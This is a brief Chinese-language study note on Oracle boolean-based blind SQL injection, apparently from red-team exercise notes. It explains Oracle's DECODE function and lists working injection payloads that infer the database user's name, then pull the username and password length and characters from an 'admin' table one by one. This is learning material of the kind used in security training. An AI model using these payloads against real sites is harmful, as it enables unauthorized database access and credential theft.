Oracle布尔盲注 · 2022护网笔记

[TOC] ## 布尔盲注类型 * decode盲注 * 猜字符盲注 ## 布尔注入判断根据页面的回显情况 ## decode简介 decode(函数或者表达式,值1,值2,值3) decode的表达式的结果等于值1，则得到值2，否则就是值3，类似于条件判断 ## decode盲注过程判断用户长度 ``` and 6=(select length(user) from dual) --+ ``` 判断用户字符串的第一个字符 ``` and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --+ ``` 判断表里的第一个字符 ``` and 1=(select decode(substr((select username from admin),1,1),'S',1,0) from dual) --+ ``` ## 通用盲注过程先获取数据长度 ``` and 37=(select length(username||password) from dual)--+ ``` 利用ascii编码进行判断 ``` and (select ascii(substr((select username from admin),1,1)) from dual)=97 ```